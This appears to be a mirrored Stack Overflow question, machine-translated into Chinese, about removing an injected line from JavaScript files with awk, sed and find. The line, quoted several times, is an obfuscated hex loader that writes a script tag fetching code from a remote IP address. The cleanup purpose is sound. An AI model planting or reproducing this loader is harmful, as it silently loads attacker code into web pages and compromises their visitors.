简体   繁体   English

使用sed替换复杂的模式

[英]replacing a complex pattern using sed

I want to replace a pattern by using sed command. 我想通过使用sed命令来替换模式。 The pattern to be removed is as below with a space. 要删除的图案如下,并带有空格。

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

Now I need to replace the above pattern with a space. 现在,我需要用空格替换上述模式。 This patter can be anywhere in the file ( ie can be on the begining on the file / end of file or between some strings) 此模式可以在文件中的任何位置(例如,可以在文件开头/文件结尾或某些字符串之间)

any tips for regex to remove via sed ? 正则表达式通过sed删除的任何提示吗?

Thanks. 谢谢。

$ cat r.awk
#!/usr/bin/awk -f

NR == FNR { # read a first file with a string to match
    str = $0
    rep = " " # replace by `rep'
    RS = "$^" # regexp which never matches => the next record will be
              # a string with a whole second file
    nextfile
}

{
    file = $0; ans = ""
    while (i = index(file, str)) {
        pre  = substr(file, 1              , i - 1)  # parts before
        post = substr(file, i + length(str))         # and after `str'
        ans  = ans pre rep # append to the output
        file = post
    }
    ans = ans file
    printf "%s", ans
}

Store a string in a file 将字符串存储在文件中

$ cat r.txt
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

An example 一个例子

$ cat f.txt
BEFORE
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
AFTER
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
END

Usage: 用法:

$ awk -f r.awk r.txt f.txt

BEFORE

AFTER

END

Another way to achieve what you are looking for "removing the pattern only" using find and sed commands in one line: 使用findsed命令在一行中实现“仅除去模式”的另一种方法:

$ find /path/to/files/ -type f \( -name "*.js" -o -name "*.json" \) -exec sh -c 'sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" "$0"' {} \;

The above command will search under specific path and remove the pattern if found from any file with these extensions js or json . 上面的命令将在特定路径下搜索,如果从带有这些扩展名jsjson任何文件中找到该模式,则将其删除。

for JS only: 仅适用于JS:

$ find /path/to/files/ -type f -name "*.js" -exec sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" '{}' \;

Feel free to remove the -name "*.x" part if you want to search for any file with any extension 如果要搜索任何扩展名的文件,请随时删除-name "*.x"部分

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM